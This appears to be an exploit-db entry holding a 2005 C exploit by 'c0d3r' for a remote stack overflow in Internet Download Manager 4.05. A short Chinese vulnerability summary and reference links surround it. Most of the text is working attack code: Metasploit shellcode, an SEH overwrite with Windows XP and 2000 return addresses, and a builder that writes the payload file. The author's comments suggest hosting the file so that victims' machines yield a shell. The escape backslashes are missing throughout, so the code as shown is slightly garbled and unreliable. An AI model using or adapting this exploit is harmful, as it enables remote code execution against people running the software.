https://www.exploit-db.com/exploits/1091
https://www.securityfocus.com/bid/89035
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200507-107

InternetDownloadManager是一款文件下载软件。InternetDownloadManager4.05版本中村子堆栈溢出漏洞。远程攻击者可通过超长URL，利用此漏洞执行任意代码。

/*

  Title : Internet Download Manager  =< 4.05 universal remote overflow Exploit
  bug analyse and exploit code by : c0d3r "Kaveh Razavi" [email protected]
  my advisory : http://www.ihsteam.com/advisory/download_manager_adv.txt
  
  ************************************************************************
  
  this bug is differnt from what was found in application called altnet
  download manager .
  if you read the code carefully you see that I left thingz for you .
  well if you want to creat an html file linked to evil download offer
  needed thingz are there , but in IE they are not usable cause exploit
  string is bigger that IE input buffer .
  I was analysing this bug and I was thinking about how to code an exploit
  for this issue , then new Mozilla exploit came up ! yea the idea of saving
  the exploit string into a file then copy/paste it to download manager 
  inpute url . there are other ways for sure . kiddies still can have fun
  with this code just as I mentioned with a bit scripting in java or other 
  shits you can link exploit string which will be created in file exploit.txt
  you can have a bad file , anyone using download manager can give a shell !
  hint! : any other folder is being counted , so my suggestion is linking to 
  root webfolder .
  sample usage shown in a 1 minute movie which can be downloaded at :
  http://www.ihsteam.com/download/video/dlm.rar
  
  ************************************************************************

  Exploit method : Structured Exception Handling known as SEH .
  Targets : should work on all win2000 and win xp's even sp2 ,
  Tested : winxp sp 1 and win2000 server sp 4
  compile : ms visual c++ 6 : cl dlm.c
  
  ************************************************************************

  Greetingz :
  
  www.ihsteam.com      LorD and NT , LorD always makes me happy with those
  www.ihssecurity.com  Nasa , berkely , stanford ,... shells :>
  www.exploitdev.com   yeah me and jamie are just started , u r0x jamie ,
  www.metasploit.com   fewer words better ones , great !
  www.class101.org     nice work is being done here ! class I used ur offsets :)
  www.c0d3r.org        my home ,nth here right now but those nice Essence words.
  other Folks and friends not mentioned here .

*/ 


#include <stdio.h>
#include <string.h>
#include <windows.h>
#define exploit "exploit.txt"
#define NOP 0x90
#define size 2519
  
  int main(int argc,char **argv)
{

/*
char crap1[]=  
"x3Cx48x45x41x44x3E"
"x3Cx6Dx65x74x61x20x68x74x74x70x2Dx65"
"x71x75x69x76x3Dx22x43x6Fx6Ex74x65x6E"
"x74x2Dx54x79x70x65x22x20x63x6Fx6Ex74"
"x65x6Ex74x3Dx22x74x65x78x74x2Fx68x74"
"x6Dx6Cx3Bx20x63x68x61x72x73x65x74x3D"
"x69x73x6Fx2Dx38x38x35x39x2Dx31x22x3E"
"x3Cx6Dx65x74x61x20x68x74x74x70x2Dx65"
"x71x75x69x76x3Dx22x72x65x66x72x65x73"
"x68x22x20x63x6Fx6Ex74x65x6Ex74x3Dx22"
"x33x3Bx20x55x52x4Cx3D";
char crap2[]= "x22x3E";
char crap3[]=
"x3Cx2Fx68x65x61x64x3E"
"x3Cx2Fx42x4Fx44x59x3E"
"x3Cx2Fx48x54x4Dx4Cx3E";
*/
  char crap4[]= "x31x31x2E";


// metasploit shellc0de wow!!! LPORT=4444 Size=399  
     unsigned char shellcode[] =
"xd9xeexd9x74x24xf4x5bx31xc9xb1x5ex81x73x17x4fx85"
"x2fx98x83xebxfcxe2xf4xb3x6dx79x98x4fx85x7cxcdx19"
"xd2xa4xf4x6bx9dxa4xddx73x0ex7bx9dx37x84xc5x13x05"
"x9dxa4xc2x6fx84xc4x7bx7dxccxa4xacxc4x84xc1xa9xb0"
"x79x1ex58xe3xbdxcfxecx48x44xe0x95x4ex42xc4x6ax74"
"xf9x0bx8cx3ax64xa4xc2x6bx84xc4xfexc4x89x64x13x15"
"x99x2ex73xc4x81xa4x99xa7x6ex2dxa9x8fxdax71xc5x14"
"x47x27x98x11xefx1fxc1x2bx0ex36x13x14x89xa4xc3x53"
"x0ex34x13x14x8dx7cxf0xc1xcbx21x74xb0x53xa6x5fxce"
"x69x2fx99x4fx85x78xcex1cx0cxcax70x68x85x2fx98xdf"
"x84x2fx98xf9x9cx37x7fxebx9cx5fx71xaaxccxa9xd1xeb"
"x9fx5fx5fxebx28x01x71x96x8cxdax35x84x68xd3xa3x18"
"xd6x1dxc7x7cxb7x2fxc3xc2xcex0fxc9xb0x52xa6x47xc6"
"x46xa2xedx5bxefx28xc1x1exd6xd0xacxc0x7ax7ax9cx16"
"x0cx2bx16xadx77x04xbfx1bx7ax18x67x1axb5x1ex58x1f"
"xd5x7fxc8x0fxd5x6fxc8xb0xd0x03x11x88xb4xf4xcbx1c"
"xedx2dx98x5exd9xa6x78x25x95x7fxcfxb0xd0x0bxcbx18"
"x7ax7axb0x1cxd1x78x67x1axa5xa6x5fx27xc6x62xdcx4f"
"x0cxccx1fxb5xb4xefx15x33xa1x83xf2x5axdcxdcx33xc8"
"x7fxacx74x1bx43x6bxbcx5fxc1x49x5fx0bxa1x13x99x4e"
"x0cx53xbcx07x0cx53xbcx03x0cx53xbcx1fx08x6bxbcx5f"
"xd1x7fxc9x1exd4x6exc9x06xd4x7excbx1ex7ax5ax98x27"
"xf7xd1x2bx59x7ax7ax9cxb0x55xa6x7exb0xf0x2fxf0xe2"
"x5cx2ax56xb0xd0x2bx11x8cxefxd0x67x79x7axfcx67x3a"
"x85x47x68xc5x81x70x67x1ax81x1ex43x1cx7axffx98";
    FILE *fp;  
    char buffer[size];
    unsigned int os;
    char ppr[5];
    char jmp[] = "xEBx0Cx90x90";
    char winxp[] = "xB1x2CxC2x77"; 
    char win2000[] ="x08xB0x01x78";
    if(argc < 2) {
    printf("n-------- Download Manager remote exploitn");
    printf("-------- copyrighted by c0d3r of IHS 2005n");
    printf("-------- usage : dlm.exe targetn");
    printf("-------- target 1 : windows xp all service packs all languages : 0n");
    printf("-------- target 2 : windows 2000 all service packs all languages : 1n");
    printf("-------- eg : dlm.exe 0n");	
    printf("-------- out file will be exploit.txt for windows xpnn");
    exit(-1) ;
  } 
    os = (unsigned short)atoi(argv[1]); 	 
    switch(os)
  {
    case 0:
    strcat(ppr,winxp);
    break;
    case 1:
    strcat(ppr,win2000); 
    break;
    default:
    printf("n[-] this target doesnt exist in the listnn");
   
    exit(-1);
  }
   printf("n-------- Download Manager remote exploitn");
   printf("-------- copyrighted by c0d3r of IHS 2005n");
   
    // heart of exploit
   
    printf("-------- building overflow stringn");
    memset(buffer,NOP,size);
    memcpy(buffer,crap4,sizeof(crap4)-1);
	memcpy(buffer+3+2077,jmp,4);
	memcpy(buffer+3+2077+4,ppr,4);
	memcpy(buffer+3+2077+4+40,shellcode,sizeof(shellcode)-1);
	buffer[size] = 0;
  
	/*
    memcpy(buffer,crap1,sizeof(crap1)-1);
	memcpy(buffer+122,crap4,sizeof(crap4)-1);
    memcpy(buffer+2192,jmp,4);
    memcpy(buffer+2196,ppr,4);
    memcpy(buffer+2200,shellcode,sizeof(shellcode)-1);
    memcpy(buffer+2599,crap2,sizeof(crap2)-1);
    memcpy(buffer+2601,crap3,sizeof(crap3)-1);
    buffer[size] = 0;
    */
	
    // EO heart of exploit  
     
	printf("-------- Done !n");
    printf("-------- Creating the exploit.txt filen");
    fp = fopen(exploit, "w+");
    fwrite(buffer, sizeof ( unsigned char ), sizeof(buffer), fp);
    fclose(fp);
    printf("-------- Done ! enjoy it !n");
    return 0;

}

// milw0rm.com [2005-07-06]

Tonec Inc. Internet Download Manager 4.05

来源:MISC
链接:http://www.ihsteam.com/download/ihsexpl/dlm.c
来源:SECTRACK
名称:1014404
链接:http://securitytracker.com/id?1014404